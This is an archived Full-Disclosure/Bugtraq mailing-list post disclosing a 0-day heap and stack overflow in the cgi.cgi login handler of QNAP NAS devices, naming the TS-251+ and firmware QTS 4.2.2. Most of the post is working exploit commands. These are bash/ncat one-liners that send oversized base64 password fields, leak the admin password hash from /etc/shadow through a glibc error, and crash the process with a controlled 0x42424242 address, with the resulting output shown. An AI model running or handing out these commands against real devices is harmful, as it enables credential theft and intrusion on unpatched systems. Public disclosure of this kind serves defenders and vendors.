lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Mon, 2 Jan 2017 15:26:58 +0000
From: bashis <>
To: "" <>, Bugtraq
Subject: Re: [FD] 0-day: QNAP NAS Devices suffer of heap overflow

Read admin password from /etc/shadow (loaded in heap at address 0x0806ce56)

[Remote Host]# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<4467;i++));do echo -en "B";done | base64 -w 0 ; echo -en "D\x56\xce\x06\x08" | base64 -w 0`  HTTP/1.0\nHost: BUG\n\n" | ncat --ssl 443 | grep glibc
*** glibc detected *** $1$$8lBa9PhdBbp9/AeeTXXXXX: free(): invalid next size (normal): 0x0806e510 ***
[Remote Host]#

Device: QNAP TS-251+
FW Version: QTS 4.2.2 (Build 20161214)


    And also;
    [Stack overflow]
    [Remote Host]# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<1489;i++));do echo -en "QUFB";done``echo -en "QUJCQkI="` HTTP/1.0\nHost: BUG\n\n” | ncat --ssl 443
    HTTP/1.1 200 OK
    Date: Mon, 02 Jan 2017 11:59:24 GMT
    Content-Length: 0
    Connection: close
    Content-Type: text/plain
    [Remote Host]# 
    [Local Host]# dmesg | grep 42424242
    [161034.536318] cgi.cgi[28705]: segfault at 42424242 ip 00000000f6c1159b sp 00000000fffe84fc error 4 in[f6ba5000+12d000]
    [Local Host]#
    [QUJCQkI=] -> Base64encode -> [BBBB]
    Have a nice day

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists